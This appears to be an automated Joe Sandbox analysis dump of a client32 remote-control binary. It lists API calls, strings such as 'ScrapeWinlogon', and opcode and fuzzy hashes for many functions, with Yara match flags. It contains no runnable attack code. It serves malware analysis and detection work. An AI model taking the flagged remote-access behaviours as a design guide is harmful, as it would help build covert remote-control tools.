                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Window$ItemMetricsRectSystem$DialogException@8ObjectPointsShowTextThrowstd::exception::exception
                                                                              • String ID: IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                              • API String ID: 2181554437-3415836059
                                                                              • Opcode ID: 1accb0bbb03bc77863436f13e3d15f929dc8c171c4ae25107a4f7bd902e08966
                                                                              • Instruction ID: 43705d0265472f43c13063854f38501adaeacc0369148bb5472ef3ca99b46591
                                                                              • Opcode Fuzzy Hash: 1accb0bbb03bc77863436f13e3d15f929dc8c171c4ae25107a4f7bd902e08966
                                                                              • Instruction Fuzzy Hash: 1E519375E00209AFDB45DF94CD81EEEF7B9FF44308F108569E5066B281EB35AA05CB91
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: swprintf
                                                                              • String ID: $$%$+
                                                                              • API String ID: 233258989-3202472541
                                                                              • Opcode ID: 51dced2a2985a59ef63a696a59479f638707418e9379f640e453f86fe788b150
                                                                              • Instruction ID: 709c54241741de87a29271ffeb556a2f401356d1bb5d83c5dcf625fd940d7789
                                                                              • Opcode Fuzzy Hash: 51dced2a2985a59ef63a696a59479f638707418e9379f640e453f86fe788b150
                                                                              • Instruction Fuzzy Hash: 6C515EF6E002499ADB16CE58C8847CE7BF5FB15304F3085C5ED44AB29AEA3DC994CB90
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CountTick
                                                                              • String ID: General$TicklePeriod
                                                                              • API String ID: 536389180-1546705386
                                                                              • Opcode ID: 583a630acb21db53e34cc03cdf69896ea0eaf712d7d07d60b781f99cd72e8e82
                                                                              • Instruction ID: df9d0f281d17993452c850789e07539b87313039e6a264bd0b80c81d914ed6ef
                                                                              • Opcode Fuzzy Hash: 583a630acb21db53e34cc03cdf69896ea0eaf712d7d07d60b781f99cd72e8e82
                                                                              • Instruction Fuzzy Hash: FE516234A00705DFE764CF68C994B9AB7E9FB44300F1085AEE55A8B381EB71BA45CB91
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _strncpy
                                                                              • String ID: Client.
                                                                              • API String ID: 2961919466-3668916897
                                                                              • Opcode ID: d86f3a707c83068dca8de9a6e42235728c30fc8aa8edad40bfa430c4d183c61d
                                                                              • Instruction ID: afd3e16b167e0e58be9e44bf621a1c8a112985171a3aa2381e53f24449598869
                                                                              • Opcode Fuzzy Hash: d86f3a707c83068dca8de9a6e42235728c30fc8aa8edad40bfa430c4d183c61d
                                                                              • Instruction Fuzzy Hash: 87419475E0425AAFDB10CF78CC84BDEBBF9AF09314F1441A9D948A7241E775BA04CB90
                                                                              APIs
                                                                              • IsWindow.USER32(?), ref: 110363CF
                                                                              • EnumChildWindows.USER32(?,Function_00035F30), ref: 1103640C
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                • Part of subcall function 110343E0: IsWindow.USER32(?), ref: 110343E8
                                                                                • Part of subcall function 110343E0: GetWindowLongA.USER32(?,000000F0), ref: 110343FB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Window$ChildEnumErrorExitLastLongMessageProcessWindowswsprintf
                                                                              • String ID: CltAutoLogon.cpp$IsWindow(hDia)
                                                                              • API String ID: 2743442841-2884807542
                                                                              • Opcode ID: 975b895f4caacf8fdd8b9513a7fe3ee3cb2752b060bb9e31cc638f616adf73a8
                                                                              • Instruction ID: 11eaf539b08052b8f60daf16ff22fa14e936f015058a14bf0137899c3d76b31f
                                                                              • Opcode Fuzzy Hash: 975b895f4caacf8fdd8b9513a7fe3ee3cb2752b060bb9e31cc638f616adf73a8
                                                                              • Instruction Fuzzy Hash: 0041BD75D20301AFC320DF25DD80AAAB7F5BF8071AF40846DD88A87A50EB31F644CB91
                                                                              APIs
                                                                                • Part of subcall function 110886C0: _memset.LIBCMT ref: 110886DF
                                                                                • Part of subcall function 110886C0: InitializeCriticalSection.KERNEL32(0000E3D0,00000000,?,11070CC3,00000000,00000000,11182F3E,000000FF), ref: 11088750
                                                                              • _memset.LIBCMT ref: 110882DA
                                                                              • _free.LIBCMT ref: 110882F4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _memset$CriticalInitializeSection_free
                                                                              • String ID: ..\CTL32\EncryptFuncs.cpp$pDES
                                                                              • API String ID: 1034327355-4272885995
                                                                              • Opcode ID: a6079e7af03cf179f1442b63be17b6fca14849e1020515595784f8ae75675a4f
                                                                              • Instruction ID: 8ae3569bce46c35fff43cf137a49856f5cdc42b16756a4486f25bf6ba65b23e7
                                                                              • Opcode Fuzzy Hash: a6079e7af03cf179f1442b63be17b6fca14849e1020515595784f8ae75675a4f
                                                                              • Instruction Fuzzy Hash: F041C675E04219AFDB20CF54CC41FAEB379EB85718F004298E90867380EB76AE54CB91
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CountTick
                                                                              • String ID: Stop reconn to %s
                                                                              • API String ID: 536389180-2663412807
                                                                              • Opcode ID: 28e149f9e8b9339cc5936daff1c8ccc8a0dde33bbe7dbcef04bf713a6a8c9fee
                                                                              • Instruction ID: ee841f7b2cabced5480f0adf42a1d2d70c561a2002c4d621d613019b8fea0109
                                                                              • Opcode Fuzzy Hash: 28e149f9e8b9339cc5936daff1c8ccc8a0dde33bbe7dbcef04bf713a6a8c9fee
                                                                              • Instruction Fuzzy Hash: 85319235E00615CFD760CFBCC980A6AB7F5EB89304F1046A9E45AC7645DB71E984CB50
                                                                              APIs
                                                                              • _memmove.LIBCMT ref: 110D1378
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorExitLastMessageProcess_memmovewsprintf
                                                                              • String ID: ..\CTL32\NSMString.cpp$IsA()$cchLen<=0 || cchLen<=(int) _tcslen(pszStr)
                                                                              • API String ID: 1528188558-323366856
                                                                              • Opcode ID: 178f97a59f0bec0598d483463499a2975e296ab7c3110b068437bcfd80d62d5f
                                                                              • Instruction ID: ca0f400cc3ae87bce4a96c7d882a21a9a029a19775e55ac1937322abd3584148
                                                                              • Opcode Fuzzy Hash: 178f97a59f0bec0598d483463499a2975e296ab7c3110b068437bcfd80d62d5f
                                                                              • Instruction Fuzzy Hash: 0C212639B007566BDB01CF99EC90F9AF3E5AFD1288F048469E99997701EE31F4058398
                                                                              APIs
                                                                              • GetTickCount.KERNEL32 ref: 1104A2B6
                                                                              • GetTickCount.KERNEL32 ref: 1104A2D8
                                                                                • Part of subcall function 1103DD20: CloseHandle.KERNEL32(00000000,110B7A30,00000001,00000000,?), ref: 1103DDC2
                                                                              Strings
                                                                              • ScrapeWinlogon(true), mode=%x, flags=%x, xrefs: 1104A293
                                                                              • ScrapeWinlogon(false), xrefs: 1104A2FD
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CountTick$CloseHandle
                                                                              • String ID: ScrapeWinlogon(false)$ScrapeWinlogon(true), mode=%x, flags=%x
                                                                              • API String ID: 3288320179-399146346
                                                                              • Opcode ID: bef47f98c8d1ca0611a16be0c1ef2ecc0455f5e92cee3a788b3969f9fb13bb47
                                                                              • Instruction ID: 87290cdcf1103bc3334aeb70066b7a5708590451a5d5a05059d6374ecb706078
                                                                              • Opcode Fuzzy Hash: bef47f98c8d1ca0611a16be0c1ef2ecc0455f5e92cee3a788b3969f9fb13bb47
                                                                              • Instruction Fuzzy Hash: 74213475F00700ABF725D6649885BFEBAC5AB8070DF248839F65B46AC0DBE5B5C0C342
                                                                              APIs
                                                                              • GetSystemMetrics.USER32(0000005E), ref: 110183BF
                                                                              • GetSystemMetrics.USER32(00002003), ref: 110183DF
                                                                              • FindWindowA.USER32(IPTip_Main_Window,00000000), ref: 11018429
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MetricsSystem$FindWindow
                                                                              • String ID: IPTip_Main_Window
                                                                              • API String ID: 3964754823-293399287
                                                                              • Opcode ID: 338d81376081f096a8910d24601292b11f0403676c3425d7a8f136870903a89b
                                                                              • Instruction ID: 48eceb47ebeb3c7c94f5e0ea21fac0982c3091e714c0091f6a40e808b7a20a73
                                                                              • Opcode Fuzzy Hash: 338d81376081f096a8910d24601292b11f0403676c3425d7a8f136870903a89b
                                                                              • Instruction Fuzzy Hash: 1411E53AD80229A7DF01DAE05E41BDE77AC5B00249F0045EBED05AB048EE69D70586E1
                                                                              APIs
                                                                              • EnterCriticalSection.KERNEL32(00000000,?,?,?,?,1103FE35,?,?,Client,DisableThumbnail,00000000,00000000,Client,DisableWatch,00000000,00000000), ref: 1105D51E
                                                                              • LeaveCriticalSection.KERNEL32(00000000,?,DisableWatch,00000000,00000000,AB86ACF8), ref: 1105D59E
                                                                              • SetEvent.KERNEL32(?,?,DisableWatch,00000000,00000000,AB86ACF8), ref: 1105D5A8
                                                                              Strings
                                                                              • Thumbnails: mon=%d, w=%d, h=%d, c=%d, interval=%d, xrefs: 1105D561
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$EnterEventLeave
                                                                              • String ID: Thumbnails: mon=%d, w=%d, h=%d, c=%d, interval=%d
                                                                              • API String ID: 3094578987-11999416
                                                                              • Opcode ID: c530e27155f7b3fdc2e9ca538483d963ca7dcdd1017b1d5184d653da29544702
                                                                              • Instruction ID: cd8e2c595cb3ca955c0a05eca4a83294a9fb2b4bfc4f95d4b2967c0930ade923
                                                                              • Opcode Fuzzy Hash: c530e27155f7b3fdc2e9ca538483d963ca7dcdd1017b1d5184d653da29544702
                                                                              • Instruction Fuzzy Hash: 6D2149B4500B65AFD364CF6AC490967FBF4FF88718700891EE5AA82B41E375F850CBA0
                                                                              APIs
                                                                              • _memmove.LIBCMT ref: 111535AC
                                                                              • _memmove.LIBCMT ref: 111535E6
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _memmove$ErrorExitLastMessageProcesswsprintf
                                                                              • String ID: ..\ctl32\WCUNPACK.C$n > 128
                                                                              • API String ID: 6605023-1396654219
                                                                              • Opcode ID: ec23489f07850d0f282c208d07d7e8fee0db15ceed7262bb29d1eb7273dc92e2
                                                                              • Instruction ID: 7dc9b17917a05d0a1a20c6fa4ac0eb705d74e08118df21bf74e35568faeb592c
                                                                              • Opcode Fuzzy Hash: ec23489f07850d0f282c208d07d7e8fee0db15ceed7262bb29d1eb7273dc92e2
                                                                              • Instruction Fuzzy Hash: 0A1125B6C3916577C3818E6A9D85A9BFB68BB4236CF048115FCB817241E771A614C7E0
                                                                              APIs
                                                                              • GetWindowPlacement.USER32(?,0000002C,75BF7AA0), ref: 110BA59F
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorExitLastMessagePlacementProcessWindowwsprintf
                                                                              • String ID: ,$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                              • API String ID: 1593395816-618755743
                                                                              • Opcode ID: 437412967ac06f634d2e58aea443df4fd2b5e784e27c5508c7a553b8aec020c5
                                                                              • Instruction ID: 723ecd8509b1f117674e3f28a2eebb62cb0adfa83db23d84f339202074e33124
                                                                              • Opcode Fuzzy Hash: 437412967ac06f634d2e58aea443df4fd2b5e784e27c5508c7a553b8aec020c5
                                                                              • Instruction Fuzzy Hash: 0B01DB79E0021DA7DB10EFB4D862FFDF3A8DB09219F00069EE8065B284DFA16A14C7C4
                                                                              APIs
                                                                              • CreateWindowExA.USER32(?,SysHeader32,11195264,?,?,?,?,?,?,?,00000000,00000000), ref: 1101434C
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateErrorExitLastMessageProcessWindowwsprintf
                                                                              • String ID: ..\ctl32\headctrl.cpp$SysHeader32$m_hWnd
                                                                              • API String ID: 2789554107-4050302278
                                                                              • Opcode ID: 1c3010da04db5bed3b6cedd171569ece4558817593313ce3a80e1c51835089e3
                                                                              • Instruction ID: 47ca1da31ef5e317866de86f9591e30fe02a5225a1dd4fd0741b7edf9cd601c6
                                                                              • Opcode Fuzzy Hash: 1c3010da04db5bed3b6cedd171569ece4558817593313ce3a80e1c51835089e3
                                                                              • Instruction Fuzzy Hash: 4C014B7621021ABBCB54DE99DC85EDBB7ADAF88608F008159F919A7240D630E850CBA0
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 1116039F
                                                                              • GetMenuItemInfoA.USER32(?,00000000,00000001,?), ref: 111603C1
                                                                              • TrackPopupMenuEx.USER32(?,?,?,?,00000000,?), ref: 111603ED
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Menu$InfoItemPopupTrack_memset
                                                                              • String ID: 0
                                                                              • API String ID: 841834121-4108050209
                                                                              • Opcode ID: e8c91e185eb2ebccdcfb0263cef9fd80509c67c6a8282b5119fa71647954d0a1
                                                                              • Instruction ID: 9d224339150c7c133c1660ae8f4408b68bc8455e6129f67dd9b2558d4baf94c6
                                                                              • Opcode Fuzzy Hash: e8c91e185eb2ebccdcfb0263cef9fd80509c67c6a8282b5119fa71647954d0a1
                                                                              • Instruction Fuzzy Hash: CE0146B1910229ABEB04DF94DD49FEBB7BCEB08355F008109F910A7280D7B5A920CBA5
                                                                              APIs
                                                                                • Part of subcall function 11110920: EnterCriticalSection.KERNEL32(00000010,00000000,74DF23A0,1100BF7B), ref: 11110928
                                                                                • Part of subcall function 11110920: LeaveCriticalSection.KERNEL32(00000010), ref: 11110935
                                                                              • _free.LIBCMT ref: 1103D221
                                                                                • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                • Part of subcall function 11110920: LeaveCriticalSection.KERNEL32(00000010,?), ref: 11110970
                                                                              • SetPriorityClass.KERNEL32(?,?), ref: 1103D24C
                                                                              • MessageBeep.USER32(00000000), ref: 1103D25E
                                                                              Strings
                                                                              • Show has overrun too much, aborting, xrefs: 1103D1F1
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$Leave$BeepClassEnterErrorFreeHeapLastMessagePriority_free
                                                                              • String ID: Show has overrun too much, aborting
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,?), ref: 1101D3EB
                                                                              • EnableWindow.USER32(00000000,?), ref: 1101D3F6
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: EnableErrorExitItemLastMessageProcessWindowwsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: EnumExitSleepThreadWindows
                                                                              • String ID: TapiFix
                                                                              APIs
                                                                                • Part of subcall function 11040700: IsWindow.USER32(?), ref: 11040720
                                                                                • Part of subcall function 11040700: GetClassNameA.USER32(?,?,00000040), ref: 11040731
                                                                              • _malloc.LIBCMT ref: 110491DD
                                                                              • _memmove.LIBCMT ref: 110491EA
                                                                              • SendMessageTimeoutA.USER32(?,0000004A,00040270,?,00000002,00001388,?), ref: 11049224
                                                                              • _free.LIBCMT ref: 1104922B
                                                                                • Part of subcall function 11048FE0: wsprintfA.USER32 ref: 11049013
                                                                                • Part of subcall function 11048FE0: WaitForInputIdle.USER32(?,00002710), ref: 11049099
                                                                                • Part of subcall function 11048FE0: CloseHandle.KERNEL32(?), ref: 110490AC
                                                                                • Part of subcall function 11048FE0: CloseHandle.KERNEL32(?), ref: 110490B5
                                                                                • Part of subcall function 11048FE0: Sleep.KERNEL32(00000014), ref: 110490D1
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseHandle$ClassIdleInputMessageNameSendSleepTimeoutWaitWindow_free_malloc_memmovewsprintf
                                                                              • String ID:
                                                                              APIs
                                                                              • Sleep.KERNEL32(000001F4,00000000,?,00000000,-111EE49C), ref: 1103E171
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Sleep
                                                                              • String ID: /weblock.htm$:%u$redirect:http://127.0.0.1
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Object$CompatibleCreateDeleteSelect$Bitmap_free_malloc
                                                                              • String ID:
                                                                              APIs
                                                                              • SetBkColor.GDI32(?,?), ref: 11143091
                                                                              • SetRect.USER32(?,?,?,?,?), ref: 111430A9
                                                                              • ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 111430C0
                                                                              • SetBkColor.GDI32(?,00000000), ref: 111430C8
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Color$RectText
                                                                              • String ID:
                                                                              • API String ID: 4034337308-0
                                                                              • Opcode ID: 26f6cc05d1df662940a62fe5a538b52049d671c1388398b7ccd782556aa038f2
                                                                              • Instruction ID: e9225e88152d902865c43eb673e3150d6d7e7d22167fd17714d79550e5345a2a
                                                                              • Opcode Fuzzy Hash: 26f6cc05d1df662940a62fe5a538b52049d671c1388398b7ccd782556aa038f2
                                                                              • Instruction Fuzzy Hash: 0C012C7264021CBBDB04DEA8DD81FEFB3ACEF49604F104159FA15A7280DAB0AD018BA5
                                                                              APIs
                                                                              • GetCurrentThreadId.KERNEL32 ref: 111103DE
                                                                              • EnterCriticalSection.KERNEL32(00000000,75BF3760,00000000,111F1590,?,110CD955,00000000,75BF3760), ref: 111103E8
                                                                              • LeaveCriticalSection.KERNEL32(00000000,75C0A1D0,00000000,?,110CD955,00000000,75BF3760), ref: 11110408
                                                                              • LeaveCriticalSection.KERNEL32(00000000,75C0A1D0,00000000,?,110CD955,00000000,75BF3760), ref: 1111041C
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$Leave$CurrentEnterThread
                                                                              • String ID:
                                                                              • API String ID: 2905768538-0
                                                                              • Opcode ID: 8fd22b812c8f62b715523e5f86df3aaa2cd2768748401e5e8898e20f481cbd2c
                                                                              • Instruction ID: 4c724308613bea48e6bb16f63c046e4f2304003fe7903f8ffd3459ebd8414c8e
                                                                              • Opcode Fuzzy Hash: 8fd22b812c8f62b715523e5f86df3aaa2cd2768748401e5e8898e20f481cbd2c
                                                                              • Instruction Fuzzy Hash: 73F0623665112CEFD305DFA5D9849AEB7A8FB99316B10417AF925C7900E630A905CBF0
                                                                              APIs
                                                                              • GetSystemMetrics.USER32(0000004E), ref: 11126318
                                                                              • GetSystemMetrics.USER32(0000004F), ref: 1112631F
                                                                              • GetSystemMetrics.USER32(00000000), ref: 1112633C
                                                                              • GetSystemMetrics.USER32(00000001), ref: 11126349
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MetricsSystem
                                                                              • String ID:
                                                                              • API String ID: 4116985748-0
                                                                              • Opcode ID: 3b4a1dd1ca9e47f377dd888b19c7a62076a78745d4869df6f922d4effe3b737a
                                                                              • Instruction ID: 028166286d3bd400be092ba0325ce689d6481c0f69bbb526fc7211a1c27e1f06
                                                                              • Opcode Fuzzy Hash: 3b4a1dd1ca9e47f377dd888b19c7a62076a78745d4869df6f922d4effe3b737a
